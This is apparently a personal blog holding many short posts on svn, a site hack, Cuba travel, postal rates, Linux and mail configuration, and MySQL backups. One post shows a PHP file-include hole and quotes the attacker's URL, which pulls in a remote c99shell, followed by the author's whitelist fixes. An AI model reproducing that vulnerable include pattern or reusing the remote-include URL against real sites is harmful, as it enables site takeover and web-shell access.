David Grant

I was trying to do an svn copy from a specific server path into a local working copy. I basically wanted to copy over the vanilla mediawiki-1.8.1 sources from my repository into a local directory (called trunk). Here is what I did:

svn copy svn+ssh://david@server/svn/repos/Projects/wiki/mediawiki/1.8.1 ./trunk

You would think that this would copy the contents of the 1.8.1 directory into the trunk directory. Wrong; it copies the 1.8.1 directory and its contents into the trunk directory, thus creating a 1.8.1 directory inside trunk. It took me forever to figure out why it was doing this instead of what I wanted it to do (which is to copy the contents of 1.8.1, not the 1.8.1 directory itself).

The problem was that the trunk directory already existed. If I removed the trunk directory, then it creates the trunk directory and copies the contents of the 1.8.1 directory into trunk.

In case anyone is curious, what I am doing is following the instructions from the svn book on how to maintain vendor branches.

So one of my sites was hacked over the weeked. Apparently I was hacked using a c99shell. I think I figured out how they did it, and I think I found a solution to the problem for now.

I had the following code in my index.php script:

<?php
if ($page)
        include($page.'.php');
else
        include('main.php');
?>

So you can go to a URL like http://www.willmusic.ca/index.php?p=tunes and it will load the contents of tunes.php for example. The whole reason for doing that is that the table of contents and header code is all in once place and the information in the main part of the pages comes from different files. These files are php files because sometimes they have some logic coded in them as well.

But the hackers were also able to go to URLs like this: http://www.willmusic.ca/index.php?p=http://membres.lycos.fr/shaunc99/she...? and access a "c-shell".

Here is a screenshot of what it looked like. It basically gives them control over the entire site to do whatever they want with it. I am just glad they did not delete anything.

So I changed my index.php script to do this instead:

<?php
if (($page) && in_array($page, $pages))
        include($page.'.php');
else
        include('main.php');
?>

where $pages is a list of the pages on the site. The $pages array already existed, so I should have done this before.

I made this even more secure, following some advice that was given to me by one of the site5 support people. He told me that the above code could still be exploited if register_globals was enabled (which it isn't right now) and someone overwrote the $pages variable. So here's the even more secure version:

<?php
if ($page) {
        $location = $pages[$page];
        if ($location != "")
                include($location);
        else
                include('main.php');
}
else
        include('main.php');
?>

where $pages$ is an associative array that maps the ?p= argument (key) to a page (value) that it is allowed to open. This way, I am specifying explicitly what pages can be included with the include command.

So I go away for the Thanksgiving weekend and come home to find out my site has been hacked. The attack consisted of setting up some elaborate phishing attacks for multiple Canadian and US banks. The main damage was done at a site that I maintain for some friends of mine, namely, Will Stroet's site. It is in a subdirectory of this site, set up with a domain pointer. I had ftp access enabled to the willmusic.ca directory ONLY and so I had assumed that the attackers had come in that way, through FTP. Then I noticed 3 files in my drupal modules/month directory. That got be really worried that there is some sort of security hole in Drupal or that my SSH credentials had been compromised in some way, because there is no FTP access to that directory (or at least there shouldn't be).

So far I have changed email passwords for the 2 email addresses set up through my hosting company site5 and changed the FTP password. Next, I am going to change my Drupal passwords and ssh password.

The good news is that I haven't lost any data as far as I know. One file was overwritten but it was easily recovered from an old backup (it was a template file that hadn't changed since the last backup anyways).

While on vacation in Cuba in June and July 2006, we rented a moped for the day and went for a drive from Cienfuegos to Rancho Luna, crossed on the ferry to Castillo de Jagua, and then took the long road back to Cienfugoes. Along the way we spotted something very interesting in the middle of nowhere, located near the coast somewhere not too far west of Castillo de Jagua near Cienfuegos.

We snapped this photo as we were going by on a little scooter/moped. Actually I think we stopped to take this picture because it looked so interesting. There was literally nothing for miles in either direction of this thing. I had assumed it was a nuclear power plant, but the idea seemed far-fetched to me and I then assumed it was some of chemical plant or perhaps a water desalination plant or something. There are some chemical factories in Cienfuegos so that seemed most plausible.

I finally did a little research and managed to find some information about it here:

The construction of an atomic power plant, started with Soviet aid in 1982, has been abandoned for ecological reasons, amongst others. The project - 75% of the construction and 20% of the equipment being finished - can be seen across the bay in the southwest.

(Once again nuclear gets a bad rap for being un-"ecological" even though it is one of the cleanest sources of power around.)

This could very well be the structure they are talking about as it is located south-west of the city, although I doubt that it is visible across the bay, but I could be wrong. I found further evidence here that actually has some pictures and what I photographed is definitely the same thing as what is shown there. Another link here is heavy on US propaganda. It's too bad if it wasn't for Chernobyl (and the United States' meddling), the Cubans might actually have a nuclear power plant.

So I have this book that I was going to ship to Toronto. Here are the specifications:

Weight: 300 grams
Length: 210 mm
Width: 135 mm
Height: 25 mm

Shipping from Vancouver to Toronto via Canada Post Regular Parcel is $10.34 with a delivery standard of 5-10 business days. I thought that was grossly expensive for a very light, average-sized paperback novel. So I checked some other quotes:

• Shipping from Vancouver to Florida via "Small Packet USA Surface" is only $6.65 with a delivery standard of 6-12 business days. It is both cheaper and barely slower than Canada Post's Regular Parcel service.
• Shipping from Vancouver to Florida via "Small Packet USA Air" is only $7.90 with a delivery standard of 6-12 business days. It is both cheaper and barely slower than Canada Post's Regular Parcel service. I would expect that this Air Mail would be closer to 6 days and the surface would be closer to 12.
• With FedEx Ground from Vancouver to Toronto it costs only $12.48 with a 4-day delivery standard (note: with a FedEx account it would be even cheaper). Only slightly cheaper than Canada Post's Regular Parcel, and a far better delivery guarantee.

Trim the package down a bit, to a height of just 20mm (instead of 25g) and a weight of about 250g (instead of 300g), about the size of another book I have here with me, and the price becomes only $2.49 from Vancouver to Toronto with Canada Post Lettermail and $2.99 to the US with Canada Post US Lettermail or $3.96 to the US with Canada Post US Light Packet. The prices suddenly change drastically even though the weight has barely changed.

Here are my observations:

• Why is shipping to Florida cheaper than shipping to Toronto? I don't see how that can ever make sense, unless of course it crosses the border in Vancouver quickly and gets handed off to USPS and they are far cheaper than Canada Post. I wouldn't be surprised as I have read that USPS is much cheaper. Is Canada Post justified in having rates higher than USPS? If they are sending the package by truck, it could be most costly to drive to Toronto than to drive to Florida. Unless of course they drove to Toronto via the US :-)
• Why is FedEx Ground with a 4-day delivery only 21% more expensive than Canada Post's 5-10 business day standard? Either FedEx Ground is highly efficient, or they are not charging enough, or Canada Post is highly inefficient or charging too much.
• Why does reducing the package's volume by 20% and the weight by 17% lead to a 76% reduction in price? This does not make sense at all. Normally you would expect a letter and a small parcel to both have some fixed cost associated with the handling that needs to be done. So let's assume a fixed cost of $0.10 for the letter and $0.10 for a parcel. Let's say the letter weighs 0.1 kg and a small parcel weighs 1 kg. There should be some variable cost to send the package that is proportional to the weight to transport it. Let's say $1/kg. So the letter's variable cost is $0.10 and the parcel's variable cost is $1. So the letter costs a total of $0.20 and the parcel costs $1.10. The parcel weighs 900% more but it costs only 550% more. This makes sense, because of the fixed costs with each item. In my example, a package weight increase of 20% led to a cost increase of 315%. Doesn't make any sense to me. Either the letter is costing them more to ship than they are charging or they are overcharging for the 300g parcel.
• I find it interesting that it is cheaper to send a 300g, 25mm book to the US than it is to ship to Canada, but for a 250g, 20mm book it is the other way around.

I think what we need is something like the small packets service in Canada. We also need some consistency in the rates. They are so many oddities and contradictions in the rates as I've pointed out above.

Some other links:

• Canada Post Letter Mail Prices Have Become Damaging To Online Merchants
• Dead Write Books, Vancouver, BC - Ridiculous postal rates

Vancouver's Python and Zope User Group will be having a talk on Python web frameworks, ie. Django and Turbogears at their upcoming meeting on October 3rd. I'm looking forward to learning about web frameworks in general a bit more and perhaps what differentiates them from each other and from Ruby on Rails.

A few nights ago we had some family over for dinner and we were talking about ridiculous airport security like the ban on liquids and such. I noted that it was possible to carry a plastic gun into an airport. Some had doubts that there were plastic guns, and I agreed, I could be wrong, but there are always plastic explosives :-) Anyways, I was dead wrong about the gun thing, but it turns out others were as well, when it came to the GLOCK 17. The GLOCK 17 has a plastic frame, and "early reports about the GLOCK incorrectly suggested that it was a wholly plastic gun, and so would not show up on metal detectors. In fact, the slide and the barrel and many other internal parts, comprising about 80% of the gun's mass, are made out of metal." Apparently no 100% plastic gun exists today. Plastic explosives do look easy enough to get on a plane, however, and detonate, and I'm not sure what anyone can do about that barring having bomb dogs sniff every passenger and bag. It does look like there are some solutions out there, including one designed at BC's own TRIUMF.

I'm probably going to get picked up tomorrow on terrorism charges under the anti-terrorism act. I just did a google search for plastic guns, plastic explosives, plastic knives with the words airport and security thrown in there. Oh well I'm sure others have searched for a lot worse.

I just found out today that six photos I took in Maui last October have been selected for inclusion in a Maui/Molokai travel guide make by Schmap. It's got to be a "Web 2.0" company with a name like "shmap". I did not enter a contest or anything. I just took the pictures and posted them to Flickr and I guess they found them and I liked them. Pretty cool eh? Here are the ones that have been selected. I hope some of them make it into the travel guide!
{{flickr:207816742}}
{{flickr:207812490}}
{{flickr:207812582}}
{{flickr:207813312}}
{{flickr:207813410}}
{{flickr:207813764}}

Great GNU screen tips from Damien Krotkine. Modify your ~/.screenrc file as follows:

vbell on
defscrollback 5000
caption always "%{= kw}%-w%{= BW}%n %t%{-}%+w %-= @%H - %LD %d %LM - %c"

Now you get a cool console at the bottom. By the way, to change the title of a screen, use CTRL-a, CTRL-A

Due to the insane amount of trackback spam I have been getting, I had to disable trackbacks altogether. As soon as the akismet drupal module<?a> supports trackbacks, I might be able to re-enable them. I really think trackbacks are a useful feature.

I wanted sshd on my MythTV box to start with a lower priority than other processes. Sometimes I do large transfers to this box over scp (although usually I use nfs). I tried:

nice -n 10 /usr/sbin/sshd ${myopts} ${SSHD_OPTS}

and

start-stop-daemon -N 10 --stop --quiet --pidfile /var/run/${SVCNAME}.pid --signal HUP

in my /etc/init.d/sshd startup script (in Gentoo) but that didn't work. Even after restarting sshd and logging out and back in again (via ssh) there were still sshd processes running at nice level 0. I think it's because sshd likes to spawn itself at priority 0 (rather than the priority of the parent process, not sure if that is standard or not, but whatever).

The solution I came up with was to run this as a cron job:

ps -o pid -C sshd --no-heading | xargs renice 10

This renices all processes named sshd to nice level 10. This can actually be run by the normal user (if you only log in via ssh as normal user) because the processes that get nice level 0 seem to be processes created by the normal user that you log in as.

Stephen Colbert won the bridge-naming content. The conditions are that if he is dead and is fluent in Hungarian, the Northern M0 Danube bridge will be named after him, according to Hungarian Law, but apparently that law could be changed.

I can't believe the number of newspapers that published an article about Condoleeza Rice and Peter McKay being an item or not being an item. I'm not sure who is stupider, the media, or the readers who clearly love to eat up their crap. Most likely it started by a bunch of bloggers joking around, posting pictures of the two holding hands, etc... and the mass media jumped on. Colbert sure ripped in the media last night on this issue making fun of both the media for writing articles about how others were writing about it, and the gossip readers, by pretending to be one himself in his usual way.

Why ssmtp should be removed from gentoo:

• ssmtp is no longer maintained upstream
• Even its successor, bssmtp has been abandoned. The writer of bssmtp and maintainer of ssmtp said himself "I have now switched back to using Postfix on my laptop."

According to this page by the maintainer, the two advantages of ssmtp are:

• it is light (doesn't matter if it's crap)
• it is easy to configure (it appears that way at first, but it isn't necessarily so, if you check out the gentoo forums)

He continues by saying that it has loads of problems:

• it doesn't fail in a nice way (this is huge, I was running into problem with ssmtp not obeying the rules in /etc/ssmtp/revaliases; the output in syslog looked the same as a succesful send, but the mail wasn't sent successfully and there is no debugging output or logging whatsoever. Compare that to postfix's excellent logging.)
• it doesn't do local delivery
• it doesn't queue messages.
• there is no nice support for several network environments.

Let me recount my recent experiences. I wanted a simple outgoing mail server. Something that I would allow me to run the following:

echo test |mail -s "test mail sent to external" me@gmail.com
echo test |mail -s "test mail sent to david" david
echo test |mail -s "test mail sent to root" root

and have all 3 message sent to me@gmail.com. With ssmtp I never got this working after many, many hours of trying. In the end, the last two commands never worked, /etc/ssmtp/revaliases was not working for some reason. Maybe I goofed, but so what. Getting postfix to work was so damn easy. All I had to do with postfix was change relayhost in /etc/postfix/main.cf like so:

relayhost = smtp.vc.shawcable.net

and add a .forward files in the home directory of the root and david users, like so:

echo "me@gmail.com" > /root/.forward
echo "me@gmail.com" > /home/david/.forward

then,

/etc/init.d/postfix start
rc-update add postfix default

Presto! It all works! I am sure that there is an easy way to make local mail to all other users on my system get forwarded to gmail as well. Additionally, if I wanted to use gmail's smtp servers instead of shaw's I'm sure that would also be easy.

Let's look at smtp's setup for a bit.

In ssmtp.conf there is a "root=" options. There you can set "who gets all mail for userids less than 1000." The "mailhub=" option is simple enough and it like the relayhost option in postfix. The "hostname=" is the strangest option. You would think that it should be set to the hostname. According to many ssmtp howtos out there, it should be set to an email address. In this case I set it to my email address at shaw (which I don't use), again, according to many howtos. Then there is the revaliases file. In here you can re-route mail to local accounts to to external email addresses. Too bad it doesn't work. Although it does work for some users apparently. The main thing I didn't like about ssmtp config files were the lack of documentation in them compared to postfix's. I definitely will never be returning to ssmtp now that everything works with postfix (and only took 2 minutes to set up).

I just discovered a very useful bash script tonight, AutoMySQLBackup. It is a nice and easy way to backup your mysql databases daily, weekly, and monthly. It was very easy to set up and works great. A great suggestion to prevent having to put the username and password for a database user with read/write access in the script is to do the following:

mysql -u root -p -e "GRANT SELECT, LOCK TABLES ON *.* TO 'backup'@'localhost' IDENTIFIED BY 'backupPW';"

That creates a database called backup with password backupPW with only SELECT and LOCK TABLES access to the database. This tip came from this gentoo-wiki.com article on MySQL backup.